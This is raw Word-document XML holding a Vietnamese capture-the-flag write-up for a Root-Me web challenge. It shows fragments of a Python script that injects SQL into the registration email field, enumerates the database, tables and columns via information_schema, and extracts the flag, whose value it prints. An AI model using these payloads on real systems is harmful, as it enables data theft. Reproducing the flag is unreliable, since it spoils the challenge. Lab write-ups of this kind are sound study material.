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A6E9" w14:textId="63C2D696" w:rsidR="00B043D6" w:rsidRDefault="00B043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Đầu tiên vào trang thì ta thấy chương trình hiện tại không có gì bất thường</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C333F13" w14:textId="1F8A316B" w:rsidR="007F3A61" w:rsidRDefault="008A1564">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0019412F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0004EFCD" wp14:editId="5FA93BB1">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="164627987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79879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2C3E" w14:textId="4CED9D6F" w:rsidR="00B043D6" w:rsidRDefault="00B043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 sẽ thực hiện kiểm tra trang đăng ký thấy được phần mail chưa được filter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CF7C2F" w14:textId="759C705C" w:rsidR="00B043D6" w:rsidRDefault="00B043D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8F71AF" wp14:editId="35191D6A">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="84526136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1369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C2D" w14:textId="551E6070" w:rsidR="00B043D6" w:rsidRPr="0019412F" w:rsidRDefault="00B043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 sẽ code để tấn công</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15BA9CBF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331C083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557485CA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723D85B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3D400743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3755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t># Get a injected value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E98BEC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DBB90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'pw'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083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'http://challenge01.root-me.org/web-serveur/ch33/?action=login'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5717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'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0'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5E62AE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"Email : ([^&lt;]+)&lt;br /&gt;"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C8AA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5FC930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609D6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4109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t># Get a injected value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1D2D0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55138D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FDBE70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'pw'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3A08F3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'http://challenge01.root-me.org/web-serveur/ch33/?action=register'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76283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'User-Agent'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'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0'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F1D34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"You can logged in !"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3D41E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2D3DB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DA585DF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DA78A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t># Get database name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E0FF6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getDatabaseName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B3A51C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D1E99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FFBAF4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57F498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35604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BEE6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"'),('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','pw', (SELECT database() LIMIT 1)); -- -"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567A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6CFD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6FE78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14ADC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18B39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6F77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Get tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2980E13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4C78A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BDAD0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7A3EA3E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65E1A4C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23C44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DBC7F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"'),('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','pw', (SELECT group_concat(table_name) FROM information_schema.columns WHERE table_schema='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 LIMIT 1)); -- -"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532C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9993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97B15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C7A3E3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1193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2077DD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A35E4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5364D9E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771E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t># Get columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA919E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getColumns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53D09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752B1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503A23F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77412E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05A40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242F0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"'),('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','pw', (SELECT group_concat(column_name) FROM information_schema.columns WHERE table_schema='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 AND table_name='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{2}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 LIMIT 0,1)); -- -"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47EB2F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4E6BA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4597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5919A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9D2F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F298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C89A6D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D90989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D4FAC13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56E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6A9955"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t># Main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D7BB7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3F1B5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"Getting Database name ..."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7EBE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getDatabaseName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ascii_letters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F127CD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90B02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"Database: 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18E7E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473EF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"Getting Tables ..."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604A7A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ascii_letters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5FC1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73F88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1269E0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4828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F575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85B11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"Getting Columns for table"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6AFB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getColumns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EFF7D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ascii_letters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database_name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2F2D5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A8A0E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F092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F4E12" w14:textId="77777777" w:rsidR="00B043D6" w:rsidRPr="00B043D6" w:rsidRDefault="00B043D6" w:rsidP="00B04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3033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"Finding flag ..."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E7C5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C4F404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5D21233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ascii_letters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10F2B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03C1532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05FA48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{0}{1}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F4AD6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"'),('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{0}</w:t>
      </w:r>
      <w:r w:rsidRPr="00B043D6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="CE9178"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>','pw', (SELECT flag FROM flag LIMIT 1)); -- -"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6D3CD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signal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83411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0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B24CCB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8A857" w14:textId="77777777" w:rsidR="00B043D6" w:rsidRPr="00B043D6" w:rsidRDefault="00B043D6" w:rsidP="00B0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43D6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="9CDCFE"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>tmp_username</w:t>
      </w:r>
      <w:r w:rsidRPr="00B043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A7B70F" w14:textId="3FEA2C84" w:rsidR="007B0A4C" w:rsidRDefault="007B0A4C" w:rsidP="00B043D6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EEC0CB8" w14:textId="43401434" w:rsidR="00B043D6" w:rsidRDefault="00B043D6" w:rsidP="00B043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Thực thi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B39526B" w14:textId="0B779709" w:rsidR="00B043D6" w:rsidRDefault="00B043D6" w:rsidP="00B043D6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5E9F7A2" wp14:editId="4D1D94BB">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="15725706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064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AD8" w14:textId="6EEF722C" w:rsidR="00B043D6" w:rsidRPr="0019412F" w:rsidRDefault="00B043D6" w:rsidP="00B043D6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B043D6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>moaZ63rVXUhlQ8tVS7Hw</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00B043D6" w:rsidRPr="0019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E"/>
    <w:rsid w:val="00077E8E"/>
    <w:rsid w:val="0019412F"/>
    <w:rsid w:val="007B0A4C"/>
    <w:rsid w:val="007F3A61"/>
    <w:rsid w:val="008A1564"/>
    <w:rsid w:val="00B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DD73"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{75A0F06A-EAC8-4E0F-8B0B-50E3FDE6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2023-04-07T18:12:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-04-10T18:17:00Z</dcterms:modified>
</cp:coreProperties>
</file>